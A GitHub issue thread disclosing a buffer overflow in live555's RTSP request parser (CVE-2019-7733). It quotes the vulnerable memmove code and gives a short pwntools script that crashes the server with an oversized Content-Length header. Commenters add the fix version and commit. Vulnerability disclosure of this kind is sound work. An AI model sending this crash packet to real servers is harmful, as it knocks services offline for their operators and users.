live555 icon indicating copy to clipboard operation
live555 copied to clipboard

Published 20 hours ago verified publisher icon rgaufman

There is a buffer overflow which can lead to dos in live555 v0.95

Open zounathan opened this issue 5 years ago • 4 comments

When parse the request packet in function handleRequestBytes, the code don't check the content-length, and use it in memmove. Finally cause the buff overflow.

    unsigned requestSize = (fLastCRLF+4-fRequestBuffer) + contentLength;
    numBytesRemaining = fRequestBytesAlreadySeen - requestSize;
    resetRequestBuffer(); // to prepare for any subsequent request
    
    if (numBytesRemaining > 0) {
      memmove(fRequestBuffer, &fRequestBuffer[requestSize], numBytesRemaining);
      newBytesRead = numBytesRemaining;
    }

There is a content-length check, but it only assigns parseSucceeded to false. This can't avoid the memmove.

Boolean parseSucceeded = parseRTSPRequestString((char*)fRequestBuffer, fLastCRLF+2 - fRequestBuffer,
						    cmdName, sizeof cmdName,
						    urlPreSuffix, sizeof urlPreSuffix,
						    urlSuffix, sizeof urlSuffix,
						    cseq, sizeof cseq,
						    sessionIdStr, sizeof sessionIdStr,
						    contentLength);
    fLastCRLF[2] = '\r'; // restore its value
    // Check first for a bogus "Content-Length" value that would cause a pointer wraparound:
    if (tmpPtr + 2 + contentLength < tmpPtr + 2) {
#ifdef DEBUG
      fprintf(stderr, "parseRTSPRequestString() returned a bogus \"Content-Length:\" value: 0x%x (%d)\n", contentLength, (int)contentLength);
#endif
      parseSucceeded = False;
    }

I can make the server crash with a simple packet.

from pwn import *
p1 = remote("IP", Port)

pl = "OPTIONS rtsp://10.113.214.93:8554/a.mkv RTSP/1.0\r\nCSeq: 1 \r\nUser-Agent: Lavf55.37.102\r\n"
pl += "Content-Length: 4294927296\r\n\r\n"
p1.send(pl)

zounathan avatar Feb 11 '19 05:02 zounathan

This was assigned CVE-2019-7733.

nluedtke avatar Feb 11 '19 22:02 nluedtke

This was addressed in 2019.05.12, please close.

http://www.live555.com/liveMedia/public/changelog.txt

hlef avatar May 12 '19 05:05 hlef

This was addressed in 2019.05.12, please close.

http://www.live555.com/liveMedia/public/changelog.txt

Could you kindly point me to the commit that fixed the issue ? Thanks :)

NicoleG25 avatar Jan 09 '20 14:01 NicoleG25

This was addressed in 2019.05.12, please close. http://www.live555.com/liveMedia/public/changelog.txt

Could you kindly point me to the commit that fixed the issue ? Thanks :)

@NicoleG25 As far as I recall: ef01f0a7db9d7a7660658d088e36c4c4d0d02e27, this line in particular https://github.com/rgaufman/live555/blob/master/liveMedia/RTSPServer.cpp#L717.

hlef avatar Jan 11 '20 08:01 hlef